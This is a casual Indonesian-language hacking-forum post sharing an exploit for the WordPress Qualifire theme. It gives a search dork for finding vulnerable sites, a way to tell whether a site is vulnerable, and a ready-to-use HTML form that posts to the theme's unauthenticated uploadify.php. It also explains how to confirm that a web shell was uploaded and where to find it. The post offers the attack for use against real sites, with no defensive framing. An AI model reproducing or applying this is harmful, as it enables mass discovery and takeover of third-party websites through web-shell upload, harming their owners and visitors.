Exploit WordPress Qualifire Themes

by Nue Bhandell - 03-22-2016 at 11:54 AM
Staff
Moderators
Posts:
45
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#1
OP
Posted: 03-22-2016, 11:54 AM
Malam Gengs, *nyari bug mulu, kapan nyari pacarnya  :D :D :D
iseng2 share exploit lama, kali aja masih crotz awkakw.

yg dh master minggir dlu beb [Image: heart.png] 


Play with Me , Baby [Image: tongue.png] 

Dork :
inurl:"/wp-content/themes/qualifire"

Vuln? biasanya Blank putih atau muncul angka/huruf gak jelas , tapi kalo 404 not found berarti ikhlasin aja hehehe

[Image: fVtRWaq.png]

Copy Script Upload CSRF:
<form
action="http://target.co.li/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>


lalu tinggal upload file/shell ente.
kalo berhasil muncul angka 1

[Image: f8WW5zW.png]

Shell/file Akses: http://www.target.co.li/filemumas

semoga bermanfaat Gengs, maap kalo post cupu  [Image: smile.png] 
waktunya Nue dan tim Katakan Putus cabut dulu gengs, karna bsk dah UAS awkakw  [Image: cool.png] 

Bye



SUMUR
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
1 Guest(s)